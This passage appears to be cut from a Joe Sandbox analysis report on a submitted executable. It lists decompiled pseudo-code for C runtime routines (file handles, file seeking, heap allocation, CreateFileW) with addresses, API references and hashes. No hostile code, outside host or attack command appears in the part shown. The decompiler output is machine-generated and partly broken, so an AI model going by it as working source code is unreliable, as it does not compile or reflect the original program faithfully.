							_push(0xfffffff6);
						} else {
							if(_t22 == 1) {
								_push(0xfffffff5);
							} else {
								_push(0xfffffff4);
							}
						}
						_pop(_t23);
						_t28 = GetStdHandle(_t23);
						if(_t28 == 0xffffffff || _t28 == 0) {
							L16:
							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							 *(_t33 + 0x18) = 0xfffffffe;
							_t20 =  *0x418eb0; // 0x4ec1e8
							if(_t20 != 0) {
								_t20 =  *(_t20 + _t31 * 4);
								 *(_t20 + 0x10) = 0xfffffffe;
							}
							goto L18;
						} else {
							_t25 = GetFileType(_t28); // executed
							if(_t25 == 0) {
								goto L16;
							} else {
								_t20 = _t25 & 0x000000ff;
								 *(_t33 + 0x18) = _t28;
								if(_t20 != 2) {
									if(_t20 == 3) {
										 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
									}
								} else {
									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
								}
								goto L18;
							}
						}
					} else {
						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
					}
					L18:
					_t31 = _t31 + 1;
				} while (_t31 != 3);
				return _t20;
			}










                                                              0x00407996
                                                              0x00407998
                                                              0x0040799c
                                                              0x004079a5
                                                              0x004079b0
                                                              0x004079c0
                                                              0x004079c4
                                                              0x004079c7
                                                              0x004079d9
                                                              0x004079c9
                                                              0x004079cc
                                                              0x004079d5
                                                              0x004079ce
                                                              0x004079d1
                                                              0x004079d1
                                                              0x004079cc
                                                              0x004079db
                                                              0x004079e3
                                                              0x004079e8
                                                              0x00407a15
                                                              0x00407a15
                                                              0x00407a19
                                                              0x00407a20
                                                              0x00407a27
                                                              0x00407a29
                                                              0x00407a2c
                                                              0x00407a2c
                                                              0x00000000
                                                              0x004079ee
                                                              0x004079ef
                                                              0x004079f7
                                                              0x00000000
                                                              0x004079f9
                                                              0x004079f9
                                                              0x004079fc
                                                              0x00407a02
                                                              0x00407a0d
                                                              0x00407a0f
                                                              0x00407a0f
                                                              0x00407a04
                                                              0x00407a04
                                                              0x00407a04
                                                              0x00000000
                                                              0x00407a02
                                                              0x004079f7
                                                              0x004079b8
                                                              0x004079b8
                                                              0x004079b8
                                                              0x00407a33
                                                              0x00407a33
                                                              0x00407a34
                                                              0x00407a40

                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 004079DD
                                                              • GetFileType.KERNELBASE(00000000), ref: 004079EF
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: FileHandleType
                                                              • String ID:
                                                              • API String ID: 3000768030-0
                                                              • Opcode ID: d6619b40f6803693720ade963561a5f1bcab158e0136fddc890cd8689d10b880
                                                              • Instruction ID: 56ab254fcbb807650b89c38ae31a0edba08049fece1e2b1d2f75ff97b3a1e88c
                                                              • Opcode Fuzzy Hash: d6619b40f6803693720ade963561a5f1bcab158e0136fddc890cd8689d10b880
                                                              • Instruction Fuzzy Hash: 4111EB71E0C74146D7304E3E8C886277A959B96330B38073BE1B6E66F1C338F942969B
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00406833 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 237 406833-40684b call 40a3b3 240 406861-406877 SetFilePointerEx 237->240 241 40684d-406854 237->241 243 406879-40688a GetLastError call 407b33 240->243 244 40688c-406896 240->244 242 40685b-40685f 241->242 245 4068b2-4068b5 242->245 243->242 244->242 247 406898-4068ad 244->247 247->245
                                                              C-Code - Quality: 88%
                                                              			E00406833(void* __ecx, void* __eflags, signed int _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				void* _v12;
				void* _t19;
				int _t20;
				signed int _t23;
				intOrPtr _t26;
				signed int _t37;
				signed int _t38;
				signed int _t41;

				_t41 = _a4;
				_push(_t37);
				_t19 = E0040A3B3(_t41);
				_t38 = _t37 | 0xffffffff;
				if(_t19 != _t38) {
					_push(_a16);
					_t20 = SetFilePointerEx(_t19, _a8, _a12,  &_v12); // executed
					if(_t20 != 0) {
						if((_v12 & _v8) == _t38) {
							goto L2;
						} else {
							_t23 = _v12;
							_t44 = (_t41 & 0x0000003f) * 0x38;
							 *( *((intOrPtr*)(0x418ec0 + (_t41 >> 6) * 4)) + _t44 + 0x28) =  *( *((intOrPtr*)(0x418ec0 + (_t41 >> 6) * 4)) + 0x28 + (_t41 & 0x0000003f) * 0x38) & 0x000000fd;
						}
					} else {
						E00407B33(GetLastError(), _a20);
						goto L2;
					}
				} else {
					_t26 = _a20;
					 *((char*)(_t26 + 0x1c)) = 1;
					 *((intOrPtr*)(_t26 + 0x18)) = 9;
					L2:
					_t23 = _t38;
				}
				return _t23;
			}












                                                              0x0040683b
                                                              0x0040683e
                                                              0x00406840
                                                              0x00406845
                                                              0x0040684b
                                                              0x00406861
                                                              0x0040686f
                                                              0x00406877
                                                              0x00406896
                                                              0x00000000
                                                              0x00406898
                                                              0x00406898
                                                              0x004068a3
                                                              0x004068ad
                                                              0x004068ad
                                                              0x00406879
                                                              0x00406883
                                                              0x00000000
                                                              0x00406889
                                                              0x0040684d
                                                              0x0040684d
                                                              0x00406850
                                                              0x00406854
                                                              0x0040685b
                                                              0x0040685b
                                                              0x0040685d
                                                              0x004068b5

                                                              APIs
                                                              • SetFilePointerEx.KERNELBASE(00000000,00000000,00416698,00401056,00000002,00401056,00000000,?,?,?,004068FD,00000000,?,00401056,00000002,00416698), ref: 0040686F
                                                              • GetLastError.KERNEL32(00401056,?,?,?,004068FD,00000000,?,00401056,00000002,00416698,00000000,00401056,00000000,00416698,0000000C,00404B9C), ref: 0040687C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: e1601f74066faa489daaaf2f2242b242259d0dd987624998d1478e1b725e3438
                                                              • Instruction ID: b1cc03f9d35e277b3be25256282a74e8f5cda56cf8101fb1f838c35d0e517a5e
                                                              • Opcode Fuzzy Hash: e1601f74066faa489daaaf2f2242b242259d0dd987624998d1478e1b725e3438
                                                              • Instruction Fuzzy Hash: 48016B33A00114AFCB059F19CC05C9E3F6ADB84320B254129F812EB2E0E735ED518B94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004040D2 Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 249 4040d2-4040df 250 4040e1-404104 call 4064ea 249->250 251 404109-40411d call 4065ab 249->251 256 404270-404272 250->256 257 404122-40412b call 4068b6 251->257 258 40411f 251->258 260 404130-40413f 257->260 258->257 261 404141 260->261 262 40414f-404158 260->262 263 404147-404149 261->263 264 404219-40421e 261->264 265 40415a-404167 262->265 266 40416c-4041a0 262->266 263->262 263->264 267 40426e-40426f 264->267 268 40426c 265->268 269 4041a2-4041ac 266->269 270 4041fd-404209 266->270 267->256 268->267 273 4041d3-4041df 269->273 274 4041ae-4041ba 269->274 271 404220-404223 270->271 272 40420b-404212 270->272 276 404226-40422e 271->276 272->264 273->271 275 4041e1-4041fb call 40466d 273->275 274->273 277 4041bc-4041ce call 4044c2 274->277 275->276 280 404230-404236 276->280 281 40426a 276->281 277->267 284 404238-40424c call 4042f7 280->284 285 40424e-404252 280->285 281->268 284->267 286 404254-404262 call 410b40 285->286 287 404265-404267 285->287 286->287 287->281
                                                              C-Code - Quality: 93%
                                                              			E004040D2(signed int __edx, void* __esi, intOrPtr* _a4, signed int _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __edi;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				signed char _t73;
				signed int _t75;
				signed char _t82;
				signed int _t85;
				signed char _t86;
				signed int _t87;
				intOrPtr _t88;
				void* _t89;
				intOrPtr _t90;
				signed int _t93;
				signed int _t97;
				signed int _t99;
				intOrPtr _t102;
				signed int _t103;
				signed int _t104;
				intOrPtr* _t105;
				signed char _t106;
				signed int _t107;
				signed int _t109;
				signed int _t112;
				signed int _t117;
				intOrPtr* _t118;
				void* _t121;
				void* _t122;

				_t116 = __esi;
				_t108 = __edx;
				if(_a4 != 0) {
					_t70 = E004065AB(_a4);
					_t102 = _a4;
					_t97 = _t70;
					__eflags =  *(_t102 + 8);
					if( *(_t102 + 8) < 0) {
						 *(_t102 + 8) = 0;
					}
					_t71 = E004068B6(_t97, 0, 0, 1, _a8); // executed
					_t103 = _t108;
					_t122 = _t121 + 0x14;
					_v8 = _t103;
					_t117 = _t71;
					_v28 = _t117;
					__eflags = _t103;
					if(__eflags > 0) {
						L7:
						_t73 =  *(_a4 + 0xc);
						__eflags = _t73 & 0x000000c0;
						if((_t73 & 0x000000c0) != 0) {
							_t75 = _t97 >> 6;
							_t104 = (_t97 & 0x0000003f) * 0x38;
							_v16 = _t75;
							_v20 = _t104;
							_t105 = _a4;
							_v12 =  *((intOrPtr*)(_t104 +  *((intOrPtr*)(0x418ec0 + _t75 * 4)) + 0x29));
							_t106 =  *(_t105 + 0xc);
							asm("cdq");
							_t99 =  *_t105 -  *((intOrPtr*)(_t105 + 4));
							_v24 = _t108;
							__eflags = _t106 & 0x00000003;
							if((_t106 & 0x00000003) == 0) {
								_t82 =  *(_a4 + 0xc) >> 2;
								__eflags = _t82 & 0x00000001;
								if((_t82 & 0x00000001) != 0) {
									L18:
									_t118 = _a4;
									_t103 = _v24;
									L19:
									_t109 = _v28;
									__eflags = _t109 | _v8;
									if((_t109 | _v8) == 0) {
										L25:
										_t85 = _t99;
										L26:
										goto L27;
									}
									_t86 =  *(_t118 + 0xc);
									__eflags = _t86 & 0x00000001;
									if((_t86 & 0x00000001) == 0) {
										__eflags = _v12 - 1;
										if(_v12 == 1) {
											_t87 = E00410B40(_t99, _t103, 2, 0);
											_t103 = _t109;
											_t99 = _t87;
											_t109 = _v28;
										}
										_t99 = _t99 + _t109;
										asm("adc ecx, [ebp-0x4]");
										goto L25;
									}
									_t85 = E004042F7(_a4, _t109, _v8, _t99, _t103, _a8);
									goto L27;
								}
								_t71 = _a8;
								 *((char*)(_t71 + 0x1c)) = 1;
								 *((intOrPtr*)(_t71 + 0x18)) = 0x16;
								goto L17;
							}
							__eflags = _v12 - 1;
							_t107 = _v16;
							_t112 = _v20;
							if(_v12 != 1) {
								L13:
								_t88 =  *((intOrPtr*)(0x418ec0 + _t107 * 4));
								__eflags =  *((char*)(_t112 + _t88 + 0x28));
								if( *((char*)(_t112 + _t88 + 0x28)) >= 0) {
									goto L18;
								}
								_t118 = _a4;
								_t89 = E0040466D( *((intOrPtr*)(_t118 + 4)),  *_t118, _v12);
								_t103 = _v24;
								_t122 = _t122 + 0xc;
								_t99 = _t99 + _t89;
								asm("adc ecx, edx");
								goto L19;
							}
							_t90 =  *((intOrPtr*)(0x418ec0 + _t107 * 4));
							__eflags =  *(_t112 + _t90 + 0x2d) & 0x00000002;
							if(( *(_t112 + _t90 + 0x2d) & 0x00000002) == 0) {
								goto L13;
							}
							_t85 = E004044C2(0, _t117, _a4, _t117, _v8, _a8);
							goto L27;
						}
						asm("cdq");
						_t85 = _t117 -  *((intOrPtr*)(_a4 + 8));
						asm("sbb ecx, edx");
						goto L26;
					} else {
						if(__eflags < 0) {
							L17:
							_t85 = _t71 | 0xffffffff;
							L27:
							return _t85;
						}
						__eflags = _t117;
						if(_t117 < 0) {
							goto L17;
						}
						goto L7;
					}
				}
				_t93 = _a8;
				 *((char*)(_t93 + 0x1c)) = 1;
				 *((intOrPtr*)(_t93 + 0x18)) = 0x16;
				return E004064EA(0, __esi, 0, 0, 0, 0, 0, _t93) | 0xffffffff;
			}





































                                                              0x004040d2
                                                              0x004040d2
                                                              0x004040df
                                                              0x0040410d
                                                              0x00404113
                                                              0x00404118
                                                              0x0040411a
                                                              0x0040411d
                                                              0x0040411f
                                                              0x0040411f
                                                              0x0040412b
                                                              0x00404130
                                                              0x00404132
                                                              0x00404135
                                                              0x00404138
                                                              0x0040413a
                                                              0x0040413d
                                                              0x0040413f
                                                              0x0040414f
                                                              0x00404152
                                                              0x00404156
                                                              0x00404158
                                                              0x00404171
                                                              0x00404174
                                                              0x00404177
                                                              0x00404181
                                                              0x00404188
                                                              0x0040418b
                                                              0x00404193
                                                              0x00404196
                                                              0x00404197
                                                              0x00404199
                                                              0x0040419d
                                                              0x004041a0
                                                              0x00404204
                                                              0x00404207
                                                              0x00404209
                                                              0x00404220
                                                              0x00404220
                                                              0x00404223
                                                              0x00404226
                                                              0x00404226
                                                              0x0040422b
                                                              0x0040422e
                                                              0x0040426a
                                                              0x0040426a
                                                              0x0040426c
                                                              0x00000000
                                                              0x0040426c
                                                              0x00404230
                                                              0x00404234
                                                              0x00404236
                                                              0x0040424e
                                                              0x00404252
                                                              0x00404259
                                                              0x0040425e
                                                              0x00404260
                                                              0x00404262
                                                              0x00404262
                                                              0x00404265
                                                              0x00404267
                                                              0x00000000
                                                              0x00404267
                                                              0x00404244
                                                              0x00000000
                                                              0x00404249
                                                              0x0040420b
                                                              0x0040420e
                                                              0x00404212
                                                              0x00000000
                                                              0x00404212
                                                              0x004041a2
                                                              0x004041a6
                                                              0x004041a9
                                                              0x004041ac
                                                              0x004041d3
                                                              0x004041d3
                                                              0x004041da
                                                              0x004041df
                                                              0x00000000
                                                              0x00000000
                                                              0x004041e1
                                                              0x004041ec
                                                              0x004041f1
                                                              0x004041f4
                                                              0x004041f7
                                                              0x004041f9
                                                              0x00000000
                                                              0x004041f9
                                                              0x004041ae
                                                              0x004041b5
                                                              0x004041ba
                                                              0x00000000
                                                              0x00000000
                                                              0x004041c6
                                                              0x00000000
                                                              0x004041cb
                                                              0x00404160
                                                              0x00404163
                                                              0x00404165
                                                              0x00000000
                                                              0x00404141
                                                              0x00404141
                                                              0x00404219
                                                              0x00404219
                                                              0x0040426e
                                                              0x00000000
                                                              0x0040426f
                                                              0x00404147
                                                              0x00404149
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00404149
                                                              0x0040413f
                                                              0x004040e1
                                                              0x004040ec
                                                              0x004040f0
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a4e8d6994717699f0e94329a8b457d3c1a343de9141e2040c0d32cd79e4d6c63
                                                              • Instruction ID: 23aaa3b16dac83aa37d476407278702b0cfa40bdaf492c72ffc7257fd558bb22
                                                              • Opcode Fuzzy Hash: a4e8d6994717699f0e94329a8b457d3c1a343de9141e2040c0d32cd79e4d6c63
                                                              • Instruction Fuzzy Hash: 1851F7B0A00204AFCF14CF58CC44AAA7BB1EFD5354F2481AEF909AB392D3759D81CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00407F0D Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 292 407f0d-407f33 call 407ce3 295 407f35-407f47 call 40c397 292->295 296 407f8c-407f8f 292->296 298 407f4c-407f51 295->298 298->296 299 407f53-407f8b 298->299
                                                              C-Code - Quality: 72%
                                                              			E00407F0D(void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v8;
				char _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				void* _t26;

				E00407CE3(__ecx,  &_v32, _a8);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_v12 == 0) {
					L3:
					return 0;
				} else {
					_t26 = E0040C397( &_v8, _a4, _v20, _a12, 0x180); // executed
					if(_t26 != 0) {
						goto L3;
					} else {
						 *0x418eb4 =  *0x418eb4 + 1;
						asm("lock or [eax], ecx");
						 *((intOrPtr*)(_a16 + 8)) = 0;
						 *((intOrPtr*)(_a16 + 0x1c)) = 0;
						 *((intOrPtr*)(_a16 + 4)) = 0;
						 *_a16 = 0;
						 *((intOrPtr*)(_a16 + 0x10)) = _v8;
						return _a16;
					}
				}
			}









                                                              0x00407f1e
                                                              0x00407f2a
                                                              0x00407f2b
                                                              0x00407f2c
                                                              0x00407f33
                                                              0x00407f8c
                                                              0x00407f8f
                                                              0x00407f35
                                                              0x00407f47
                                                              0x00407f51
                                                              0x00000000
                                                              0x00407f53
                                                              0x00407f56
                                                              0x00407f62
                                                              0x00407f6a
                                                              0x00407f70
                                                              0x00407f76
                                                              0x00407f7c
                                                              0x00407f84
                                                              0x00407f8b
                                                              0x00407f8b
                                                              0x00407f51

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: __wsopen_s
                                                              • String ID:
                                                              • API String ID: 3347428461-0
                                                              • Opcode ID: aa105744ec724d6492fa52795bcd8a3472d403bb09466538711de480dce8988d
                                                              • Instruction ID: 499fe2b5395409ba64e5587ff3f471bb224acec686096afd9ad12c4f2888ffd7
                                                              • Opcode Fuzzy Hash: aa105744ec724d6492fa52795bcd8a3472d403bb09466538711de480dce8988d
                                                              • Instruction Fuzzy Hash: 4A111871A0420AAFCB05DF58E94199B7BF5EF48304F0440AAF805EB351D674E911CBA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00408637 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 300 408637-408642 301 408650-408656 300->301 302 408644-40864e 300->302 304 408658-408659 301->304 305 40866f-408680 RtlAllocateHeap 301->305 302->301 303 408684-40868f call 407b6a 302->303 309 408691-408693 303->309 304->305 306 408682 305->306 307 40865b-408662 call 405c68 305->307 306->309 307->303 313 408664-40866d call 40b172 307->313 313->303 313->305
                                                              C-Code - Quality: 100%
                                                              			E00408637(signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x41931c, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00405C68();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00407B6A())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E0040B172(__eflags, _t19);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}








                                                              0x0040863d
                                                              0x00408642
                                                              0x00408650
                                                              0x00408650
                                                              0x00408656
                                                              0x00408658
                                                              0x00408658
                                                              0x0040866f
                                                              0x00408678
                                                              0x00408680
                                                              0x00000000
                                                              0x00000000
                                                              0x00408660
                                                              0x00408662
                                                              0x00408684
                                                              0x00408689
                                                              0x0040868f
                                                              0x00000000
                                                              0x0040868f
                                                              0x00408665
                                                              0x0040866b
                                                              0x0040866d
                                                              0x00000000
                                                              0x00000000
                                                              0x0040866d
                                                              0x00000000
                                                              0x0040866f
                                                              0x00408648
                                                              0x0040864e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000008,00401043,?,?,00406E0E,00000001,00000364,?,00000007,000000FF,?,00407B6F,00404774,00416678,00000010,00404825), ref: 00408678
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: be9bc746c27aef2aebc04bf4b34705a674c11dd085718fbf78c15a8a5f8c8caf
                                                              • Instruction ID: df5b740612e1de9bb7099b5f70f78f8fb923898ce6b5c21f08b47179631472d2
                                                              • Opcode Fuzzy Hash: be9bc746c27aef2aebc04bf4b34705a674c11dd085718fbf78c15a8a5f8c8caf
                                                              • Instruction Fuzzy Hash: C0F0BB3150452596DB215A325E05A5B37589B52760B1BC93FEC84B62D0CF3DD80185ED
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040A6A3 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 316 40a6a3-40a6af 317 40a6e1-40a6ec call 407b6a 316->317 318 40a6b1-40a6b3 316->318 326 40a6ee-40a6f0 317->326 320 40a6b5-40a6b6 318->320 321 40a6cc-40a6dd RtlAllocateHeap 318->321 320->321 322 40a6b8-40a6bf call 405c68 321->322 323 40a6df 321->323 322->317 328 40a6c1-40a6ca call 40b172 322->328 323->326 328->317 328->321
                                                              C-Code - Quality: 100%
                                                              			E0040A6A3(long _a4) {
				void* _t4;
				void* _t6;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00407B6A())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x41931c, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00405C68();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E0040B172(__eflags, _t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}






                                                              0x0040a6a9
                                                              0x0040a6af
                                                              0x0040a6e1
                                                              0x0040a6e6
                                                              0x0040a6ec
                                                              0x00000000
                                                              0x0040a6ec
                                                              0x0040a6b3
                                                              0x0040a6b5
                                                              0x0040a6b5
                                                              0x0040a6cc
                                                              0x0040a6d5
                                                              0x0040a6dd
                                                              0x00000000
                                                              0x00000000
                                                              0x0040a6bd
                                                              0x0040a6bf
                                                              0x00000000
                                                              0x00000000
                                                              0x0040a6c2
                                                              0x0040a6c8
                                                              0x0040a6ca
                                                              0x00000000
                                                              0x00000000
                                                              0x0040a6ca
                                                              0x00000000

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,00409475,?,?,00409475,00000220,?,00000000,?), ref: 0040A6D5
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: db7570263c42a376946e9eca7eaaa77a0fe9ba14cf4d4c7ae28588a5c793ca5e
                                                              • Instruction ID: 66c6cfcb63a6b1a35047815a8c829347cbf1df7d474511148cbeee9d9daa353a
                                                              • Opcode Fuzzy Hash: db7570263c42a376946e9eca7eaaa77a0fe9ba14cf4d4c7ae28588a5c793ca5e
                                                              • Instruction Fuzzy Hash: 55E0A02150031166DB2166365C00B5B36689B023A0F184633EC84B62E0CB3EDC2195AF
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040C070 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 331 40c070-40c094 CreateFileW
                                                              C-Code - Quality: 100%
                                                              			E0040C070(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
				void* _t10;

				_t10 = CreateFileW(_a4, _a16, _a24, _a8, _a20, _a28 | _a32, 0); // executed
				return _t10;
			}




                                                              0x0040c08d
                                                              0x0040c094

                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,00000000,?,0040C460,?,?,00000000,?,0040C460,?,0000000C), ref: 0040C08D
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: ee011ea15fa47f3e8f8e62051be055a0f7823555ed440cff19abb18d1e11d41a
                                                              • Instruction ID: 0b1d8daba3015af28ec98abb3884bff436453666314a6f6df86decdfee5a869d
                                                              • Opcode Fuzzy Hash: ee011ea15fa47f3e8f8e62051be055a0f7823555ed440cff19abb18d1e11d41a
                                                              • Instruction Fuzzy Hash: 50D06C3201014DBFDF029F84DD06EDA3FAAFB4C754F018010BA1856020C732E861AB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 0040636B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              C-Code - Quality: 81%
                                                              			E0040636B(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, char _a4, char _a8, char _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x418014; // 0xfc7b77c5
				_t41 = _t40 ^ _t69;
